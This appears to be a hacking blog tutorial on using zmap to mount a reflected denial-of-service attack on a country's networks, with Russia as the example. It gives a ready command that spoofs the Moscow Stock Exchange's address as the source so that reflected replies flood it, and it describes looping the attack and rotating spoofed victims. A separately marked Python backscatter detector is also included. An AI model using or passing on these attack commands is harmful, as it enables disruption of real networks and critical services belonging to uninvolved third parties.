alvin gitonga

Saturate and DoS any Country's Internet with zmap

Updated: Oct 2, 2022

CyberMorans,

As many of you know, zmap is a powerful scanning tool that is capable of scanning the entire Internet in 45 minutes.

What makes this tool different is its ability to send scans to millions of systems simultaneously. In this post and tutorial, we will use Russia as an example but this can work for any country. Why Russia?....well, because Russia!


So let's get to it, warriors...



Step 1: Download and Install zmap

First, this technique requires that you have an installation of Linux. I prefer Kali Linux:

sudo apt install zmap

Step 2: Select a Target Range and Source IP

Normally, when we use a scanner, we want the response packets to be sent back to our IP. Not in this case. We don't care what the response is, we just want to DoS the target system.


In addition, if we spoof our IP address, we can have the responses from a large number of systems returning to another system in Russia further crippling that system or any other target country.


For example, I could send out packets to a list of Russian IP addresses and spoof the IP address using the Moscow Stock Exchange IP. The packets will go out to all the IP addresses on my list and they will all respond to the Moscow Stock Exchange server. This could be thousands or millions of systems. This is very similar to the Smurf attack. We can up the ante by using multiple threads to send the packets and send multiple packets to each system.

To build our command, it will look like this:

sudo zmap -i eth1 -S 85.118.181.8 -B 10G -p 80 -T 10 -P 10 95.81.0.0/16

Where:

sudo gives the command root privileges

zmap is the scanner command

-i eth1 designates the interface (default is eth0)

-S 85.118.181.8 is the spoofed IP address of the sender (in this case, the Moscow Stock Exchange)

-B 10G is the bandwidth to use (10 Gigabit in this case)

-p 80 is the port to scan (use 80 or 443)

-T 10 the number of threads to use (default is 1)

-P 10 is the number of probes to send to each host (default is 1)

95.81.192.0/24 the destination IP address(es)


To run continuously, we can create a simple script that runs it 10,000 times with a 5s rest between each execution. Open a text editor such as nano and enter the following commands:

Save the script with a name such as zmapDoS.sh. We need to change the permissions to enable us to execute it.

sudo chmod 755 zmapDoS.sh 

Run the script to get this output:

sudo ./zmapDoS.sh

For optimal effect, use a different spoofed IP address in the target country as the source (-S).
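On the receiving network, the reflected replies described in Step 2 appear as SYN-ACK and RST packets from port 80 of many hosts, with no matching outbound SYN. The following is an added example, not part of the original post, that flags this pattern in flow records; the addresses are constructed from documentation ranges, and the function names, window and threshold are assumptions.

```python
from collections import defaultdict

# Hypothetical protected host (documentation address range, not a real system).
PROTECTED = "192.0.2.10"

def build_sample():
    """Constructed records: (ts, src, sport, dst, dport, tcp_flags)."""
    recs = [
        # Legitimate: the protected host opens a connection and gets a SYN-ACK.
        (0.10, PROTECTED, 40000, "198.51.100.5", 80, "S"),
        (0.15, "198.51.100.5", 80, PROTECTED, 40000, "SA"),
    ]
    # Reflected replies: 60 hosts answer SYNs the protected host never sent.
    for i in range(1, 61):
        flags = "SA" if i % 3 else "RA"   # open ports answer SYN-ACK, closed RST
        recs.append((1.0 + i * 0.01, f"203.0.113.{i}", 80,
                     PROTECTED, 50000 + i, flags))
    return recs

def find_backscatter(records, protected, window=5.0, min_sources=50):
    """Return [(window_start, distinct_sources)] for every time window in which
    replies without a matching outbound SYN come from >= min_sources hosts."""
    pending = set()                  # (remote_ip, remote_port, local_port)
    unsolicited = defaultdict(set)   # window index -> sources of stray replies
    for ts, src, sport, dst, dport, flags in sorted(records):
        if src == protected and flags == "S":
            # Remember connections we really initiated. A production tracker
            # would also expire these entries after a timeout.
            pending.add((dst, dport, sport))
        elif dst == protected and flags in ("SA", "RA", "R"):
            if (src, sport, dport) not in pending:
                unsolicited[int(ts // window)].add(src)
    return [(w * window, len(srcs))
            for w, srcs in sorted(unsolicited.items())
            if len(srcs) >= min_sources]

if __name__ == "__main__":
    for start, count in find_backscatter(build_sample(), PROTECTED):
        print(f"window starting {start:.1f}s: unsolicited replies "
              f"from {count} distinct hosts")
```

An alert from this check tells the receiving network that its address is being used as a spoofed source, which is the evidence upstream providers need in order to apply source-address filtering.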

Conclusion

Subscribe to receive notifications of similar posts where we will be reverse engineering malware and the technical aspect of vulnerabilities as well as how an attacker may use this vulnerability as an attack vector and other Infosec stuff...


Morans,


Thank you for your time, Like and leave a comment/review and as always, stay awesome!